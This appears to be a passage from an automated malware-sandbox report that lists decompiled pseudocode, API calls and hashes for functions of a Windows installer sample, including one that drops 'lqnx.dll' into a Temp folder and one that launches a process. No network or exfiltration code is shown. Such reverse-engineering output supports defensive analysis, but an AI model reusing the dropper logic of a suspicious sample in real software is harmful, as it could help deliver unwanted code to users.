                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00401D38, Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 67%
                                                                                            			E00401D38() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a);
				0x40b044->lfHeight =  ~(MulDiv(E00402A0C(2), _t6, 0x48));
				 *0x40b054 = E00402A0C(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x18));
				 *0x40b05b = 1;
				 *0x40b058 = _t11 & 0x00000001;
				 *0x40b059 = _t11 & 0x00000002;
				 *0x40b05a = _t11 & 0x00000004;
				E00405BE9(_t18, _t24, _t26, 0x40b060,  *((intOrPtr*)(_t28 - 0x24)));
				_t14 = CreateFontIndirectA(0x40b044);
				_push(_t14);
				_push(_t26);
				E00405B25();
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}











                                                                                            0x00401d46
                                                                                            0x00401d5f
                                                                                            0x00401d69
                                                                                            0x00401d6e
                                                                                            0x00401d79
                                                                                            0x00401d80
                                                                                            0x00401d92
                                                                                            0x00401d98
                                                                                            0x00401d9d
                                                                                            0x00401da7
                                                                                            0x004024eb
                                                                                            0x00401561
                                                                                            0x00402866
                                                                                            0x004028c1
                                                                                            0x004028cd

                                                                                            APIs
                                                                                            • GetDC.USER32(?), ref: 00401D3F
                                                                                            • GetDeviceCaps.GDI32(00000000), ref: 00401D46
                                                                                            • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D55
                                                                                            • CreateFontIndirectA.GDI32(0040B044), ref: 00401DA7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.776267433.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.776225770.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776324072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776362591.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776529964.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776577449.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776659350.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776751775.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: CapsCreateDeviceFontIndirect
                                                                                            • String ID:
                                                                                            • API String ID: 3272661963-0
                                                                                            • Opcode ID: 8ab92fdc2903857b72d1cffa18b3104b68d957a3c6a7ba5d3e2689a32af85142
                                                                                            • Instruction ID: d817c33c406d5a72f0d35d0353d877ca697365183e6ac762242a66cad999de2e
                                                                                            • Opcode Fuzzy Hash: 8ab92fdc2903857b72d1cffa18b3104b68d957a3c6a7ba5d3e2689a32af85142
                                                                                            • Instruction Fuzzy Hash: DFF06871A482C0AFE70167709F5AB9B3F64D712305F104476F251BA2E3C77D14448BAD
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00402BF1, Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E00402BF1(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x420c48; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x42ec2c;
						if(_t2 >  *0x42ec2c) {
							_t3 = CreateDialogParamA( *0x42ec20, 0x6f, 0, E00402B6E, 0);
							 *0x420c48 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00405F93(0);
					}
				} else {
					_t6 =  *0x420c48; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x420c48 = 0;
					return _t6;
				}
			}






                                                                                            0x00402bf8
                                                                                            0x00402c12
                                                                                            0x00402c18
                                                                                            0x00402c22
                                                                                            0x00402c28
                                                                                            0x00402c2e
                                                                                            0x00402c3f
                                                                                            0x00402c48
                                                                                            0x00000000
                                                                                            0x00402c4d
                                                                                            0x00402c54
                                                                                            0x00402c1a
                                                                                            0x00402c21
                                                                                            0x00402c21
                                                                                            0x00402bfa
                                                                                            0x00402bfa
                                                                                            0x00402c01
                                                                                            0x00402c04
                                                                                            0x00402c04
                                                                                            0x00402c0a
                                                                                            0x00402c11
                                                                                            0x00402c11

                                                                                            APIs
                                                                                            • DestroyWindow.USER32(00000000,00000000,00402DD1,00000001), ref: 00402C04
                                                                                            • GetTickCount.KERNEL32 ref: 00402C22
                                                                                            • CreateDialogParamA.USER32(0000006F,00000000,00402B6E,00000000), ref: 00402C3F
                                                                                            • ShowWindow.USER32(00000000,00000005), ref: 00402C4D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.776267433.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.776225770.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776324072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776362591.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776529964.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776577449.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776659350.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776751775.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                            • String ID:
                                                                                            • API String ID: 2102729457-0
                                                                                            • Opcode ID: 314feb9a6f5b037bccdbcd606c1efed59a9f25e3e49878e5389ae12efd8f53aa
                                                                                            • Instruction ID: af7afb5c67b035eb61978086e86d3b64d4827bf2199b448f7584534e2ab44da5
                                                                                            • Opcode Fuzzy Hash: 314feb9a6f5b037bccdbcd606c1efed59a9f25e3e49878e5389ae12efd8f53aa
                                                                                            • Instruction Fuzzy Hash: 46F0E270A0D260ABC3746F66FE8C98F7BA4F744B017400876F104B11E9CA7858C68B9D
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00402053, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134comCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 74%
                                                                                            			E00402053() {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E00402A29(0xfffffff0);
				_t96 = E00402A29(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x34)) = E00402A29(2);
				 *((intOrPtr*)(_t100 - 0xc)) = E00402A29(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x38)) = E00402A29(0x45);
				if(E00405727(_t96) == 0) {
					E00402A29(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x407504, _t75, 1, 0x4074f4, _t44);
				if(_t44 < _t75) {
					L13:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407514, _t100 - 8);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\hardz\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x18);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x18);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0xc)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 0xc)),  *(_t100 - 0x18) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x34)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x38)));
						if(_t95 >= _t75) {
							_t95 = 0x80004005;
							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409438, 0x400) != 0) {
								_t69 =  *((intOrPtr*)(_t100 - 8));
								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409438, 1);
							}
						}
						_t66 =  *((intOrPtr*)(_t100 - 8));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}





















                                                                                            0x0040205c
                                                                                            0x00402066
                                                                                            0x0040206f
                                                                                            0x00402079
                                                                                            0x00402082
                                                                                            0x0040208c
                                                                                            0x00402090
                                                                                            0x00402090
                                                                                            0x00402095
                                                                                            0x004020a6
                                                                                            0x004020ae
                                                                                            0x0040218e
                                                                                            0x0040218e
                                                                                            0x00402195
                                                                                            0x004020b4
                                                                                            0x004020b4
                                                                                            0x004020c5
                                                                                            0x004020c9
                                                                                            0x004020cf
                                                                                            0x004020d9
                                                                                            0x004020db
                                                                                            0x004020e6
                                                                                            0x004020e9
                                                                                            0x004020f6
                                                                                            0x004020f8
                                                                                            0x004020fa
                                                                                            0x00402101
                                                                                            0x00402104
                                                                                            0x00402104
                                                                                            0x00402107
                                                                                            0x00402111
                                                                                            0x00402119
                                                                                            0x0040211e
                                                                                            0x0040212a
                                                                                            0x0040212a
                                                                                            0x0040212d
                                                                                            0x00402136
                                                                                            0x00402139
                                                                                            0x00402142
                                                                                            0x00402147
                                                                                            0x00402159
                                                                                            0x00402168
                                                                                            0x0040216a
                                                                                            0x00402176
                                                                                            0x00402176
                                                                                            0x00402168
                                                                                            0x00402178
                                                                                            0x0040217e
                                                                                            0x0040217e
                                                                                            0x00402181
                                                                                            0x00402187
                                                                                            0x0040218c
                                                                                            0x004021a1
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040218c
                                                                                            0x00402197
                                                                                            0x004028c1
                                                                                            0x004028cd

                                                                                            APIs
                                                                                            • CoCreateInstance.OLE32(00407504,?,00000001,004074F4,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020A6
                                                                                            • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409438,00000400,?,00000001,004074F4,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402160
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp, xrefs: 004020DE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.776267433.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.776225770.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776324072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776362591.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776529964.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776577449.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776659350.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776751775.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: ByteCharCreateInstanceMultiWide
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp
                                                                                            • API String ID: 123533781-501415292
                                                                                            • Opcode ID: 0f4e10af4ab318a31e6fcfc6a713dc1191477b15d05add315443f5ab89249dcc
                                                                                            • Instruction ID: 8f67ba42191d57eba63015a6e8d0bffc44353c0eb35145c2afa1481ff4163fd5
                                                                                            • Opcode Fuzzy Hash: 0f4e10af4ab318a31e6fcfc6a713dc1191477b15d05add315443f5ab89249dcc
                                                                                            • Instruction Fuzzy Hash: 2D414C75A00205BFCB00DFA8CD89E9E7BB6EF49354F204169FA05EB2D1CA799C41CB94
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00404E03, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E00404E03(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x42a088 != _t22) {
							 *0x42a088 = _t22;
							E00405BC7(0x42a0a0, 0x42f000);
							E00405B25(0x42f000, _t22);
							E0040140B(6);
							E00405BC7(0x42f000, 0x42a0a0);
						}
						L11:
						return CallWindowProcA( *0x42a090, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E00404782(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403ECF(0x413);
				return 0;
			}




                                                                                            0x00404e0f
                                                                                            0x00404e34
                                                                                            0x00404e54
                                                                                            0x00404e57
                                                                                            0x00404e5a
                                                                                            0x00404e71
                                                                                            0x00404e77
                                                                                            0x00404e7e
                                                                                            0x00404e85
                                                                                            0x00404e8c
                                                                                            0x00404e91
                                                                                            0x00404e97
                                                                                            0x00000000
                                                                                            0x00404ea7
                                                                                            0x00404e41
                                                                                            0x00404e94
                                                                                            0x00404e94
                                                                                            0x00000000
                                                                                            0x00404e94
                                                                                            0x00404e4d
                                                                                            0x00404e4f
                                                                                            0x00000000
                                                                                            0x00404e4f
                                                                                            0x00404e15
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00404e1c
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • IsWindowVisible.USER32 ref: 00404E39
                                                                                            • CallWindowProcA.USER32 ref: 00404EA7
                                                                                              • Part of subcall function 00403ECF: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00403EE1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.776267433.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.776225770.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776324072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776362591.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776529964.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776577449.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776659350.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776751775.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                                            • String ID:
                                                                                            • API String ID: 3748168415-3916222277
                                                                                            • Opcode ID: bb110161f1a3672e5f414d3b7256019bd36f5b3292f6cf5a111e70d7da7d909c
                                                                                            • Instruction ID: a1b1c3265e10147a864b820895246e20bcc7fdce94b5a9a997a836c51e1a414d
                                                                                            • Opcode Fuzzy Hash: bb110161f1a3672e5f414d3b7256019bd36f5b3292f6cf5a111e70d7da7d909c
                                                                                            • Instruction Fuzzy Hash: 4C113D71500218ABDB215F51DC44E9B3B69FB44759F00803AFA18691D1C77C5D619FAE
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004024F1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E004024F1(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x20)) == __ebx) {
					_t7 = lstrlenA(E00402A29(0x11));
				} else {
					E00402A0C(1);
					 *0x40a040 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E00405B3E(_t17 + 8, _t15), "C:\Users\hardz\AppData\Local\Temp\nsv161C.tmp\lqnx.dll", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}









                                                                                            0x004024f1
                                                                                            0x004024f1
                                                                                            0x004024f4
                                                                                            0x0040250f
                                                                                            0x004024f6
                                                                                            0x004024f8
                                                                                            0x004024fd
                                                                                            0x00402504
                                                                                            0x00402516
                                                                                            0x0040268f
                                                                                            0x0040268f
                                                                                            0x0040251c
                                                                                            0x0040252e
                                                                                            0x004015a6
                                                                                            0x004015a8
                                                                                            0x00000000
                                                                                            0x004015ae
                                                                                            0x004015a8
                                                                                            0x004028c1
                                                                                            0x004028cd

                                                                                            APIs
                                                                                            • lstrlenA.KERNEL32(00000000,00000011), ref: 0040250F
                                                                                            • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsv161C.tmp\lqnx.dll,00000000,?,?,00000000,00000011), ref: 0040252E
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp\nsv161C.tmp\lqnx.dll, xrefs: 004024FD, 00402522
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.776267433.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.776225770.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776324072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776362591.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776529964.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776577449.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776659350.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776751775.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: FileWritelstrlen
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsv161C.tmp\lqnx.dll
                                                                                            • API String ID: 427699356-3244651025
                                                                                            • Opcode ID: 76b72eb1bb037845af2373cb3d3fbf761991c376917fb0c01088b7ebefde820f
                                                                                            • Instruction ID: 02596e95378ee295436ef63fdf7a12543175d591b2ab5856f5875b5858eb07cb
                                                                                            • Opcode Fuzzy Hash: 76b72eb1bb037845af2373cb3d3fbf761991c376917fb0c01088b7ebefde820f
                                                                                            • Instruction Fuzzy Hash: A7F082B2A04244BFD710EFA59E49AEF7668DB40348F20043BF142B51C2E6BC99419B6E
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00405427, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E00405427(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x42c0a8->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x42c0a8,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                                                            0x00405430
                                                                                            0x0040544c
                                                                                            0x00405454
                                                                                            0x00405459
                                                                                            0x00000000
                                                                                            0x0040545f
                                                                                            0x00405463

                                                                                            APIs
                                                                                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0042C0A8,Error launching installer), ref: 0040544C
                                                                                            • CloseHandle.KERNEL32(?), ref: 00405459
                                                                                            Strings
                                                                                            • Error launching installer, xrefs: 0040543A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.776267433.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.776225770.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776324072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776362591.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776529964.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776577449.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776659350.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776751775.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: CloseCreateHandleProcess
                                                                                            • String ID: Error launching installer
                                                                                            • API String ID: 3712363035-66219284
                                                                                            • Opcode ID: 352801a7e77fb30640a675ef02418396bf0d6615a7888bd77d000c6466e39ab6
                                                                                            • Instruction ID: 2c90aa490b53110c60c3ebae751c11bf5c05897806c56d3989ec330efb9c4960
                                                                                            • Opcode Fuzzy Hash: 352801a7e77fb30640a675ef02418396bf0d6615a7888bd77d000c6466e39ab6
                                                                                            • Instruction Fuzzy Hash: 35E0ECB4A04209BFDB109FA4EC49AAF7BBCFB00305F408521AA14E2150E774D8148AA9
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00403585, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E00403585() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x42905c;
				_t3 = E0040356A(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x42905c =  *0x42905c & 0x00000000;
				return _t3;
			}







                                                                                            0x00403586
                                                                                            0x0040358e
                                                                                            0x00403595
                                                                                            0x00403598
                                                                                            0x00403598
                                                                                            0x0040359a
                                                                                            0x0040359f
                                                                                            0x004035a6
                                                                                            0x004035ac
                                                                                            0x004035b0
                                                                                            0x004035b1
                                                                                            0x004035b9

                                                                                            APIs
                                                                                            • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,?,0040355D,00403366,00000020), ref: 0040359F
                                                                                            • GlobalFree.KERNEL32 ref: 004035A6
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00403597
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.776267433.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.776225770.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776324072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776362591.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776529964.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776577449.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776659350.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776751775.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: Free$GlobalLibrary
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                            • API String ID: 1100898210-3916508600
                                                                                            • Opcode ID: ac7f27994bd3325b2d0095e79668b7c9fa9e3b8299eadab29ed3cfae008e212f
                                                                                            • Instruction ID: 66eb0e2672836502cdeb887367c424fec6a3009010210fcd00c586b28cfd98d1
                                                                                            • Opcode Fuzzy Hash: ac7f27994bd3325b2d0095e79668b7c9fa9e3b8299eadab29ed3cfae008e212f
                                                                                            • Instruction Fuzzy Hash: 45E0C233900130A7CB715F44EC0475A776C6F49B22F010067ED00772B0C3742D424BD8
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00405701, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E00405701(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                                                                                            0x00405702
                                                                                            0x0040570c
                                                                                            0x0040570e
                                                                                            0x00405715
                                                                                            0x0040571d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040571d
                                                                                            0x0040571f
                                                                                            0x00405724

                                                                                            APIs
                                                                                            • lstrlenA.KERNEL32(80000000,C:\Program Files (x86)\Gw4n,00402CC1,C:\Program Files (x86)\Gw4n,C:\Program Files (x86)\Gw4n,C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe,C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe,80000000,00000003), ref: 00405707
                                                                                            • CharPrevA.USER32(80000000,00000000,80000000,C:\Program Files (x86)\Gw4n,00402CC1,C:\Program Files (x86)\Gw4n,C:\Program Files (x86)\Gw4n,C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe,C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe,80000000,00000003), ref: 00405715
                                                                                            Strings
                                                                                            • C:\Program Files (x86)\Gw4n, xrefs: 00405701
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.776267433.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.776225770.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776324072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776362591.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776529964.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776577449.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776659350.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776751775.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: CharPrevlstrlen
                                                                                            • String ID: C:\Program Files (x86)\Gw4n
                                                                                            • API String ID: 2709904686-3340105481
                                                                                            • Opcode ID: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                                                                                            • Instruction ID: 28705abfcf709d76dd5e93a9f01d56f8a4c6275228320a945a5a59c68c4d3cd5
                                                                                            • Opcode Fuzzy Hash: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                                                                                            • Instruction Fuzzy Hash: 21D0A762409D709EF30363148C04B9F7A88CF12300F0904A2E580A3191C2785C414BBD
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00405813, Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E00405813(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}






                                                                                            0x0040581f
                                                                                            0x00405821
                                                                                            0x00405849
                                                                                            0x0040582e
                                                                                            0x00405833
                                                                                            0x0040583e
                                                                                            0x00000000
                                                                                            0x0040585b
                                                                                            0x00405847
                                                                                            0x00405847
                                                                                            0x00000000

                                                                                            APIs
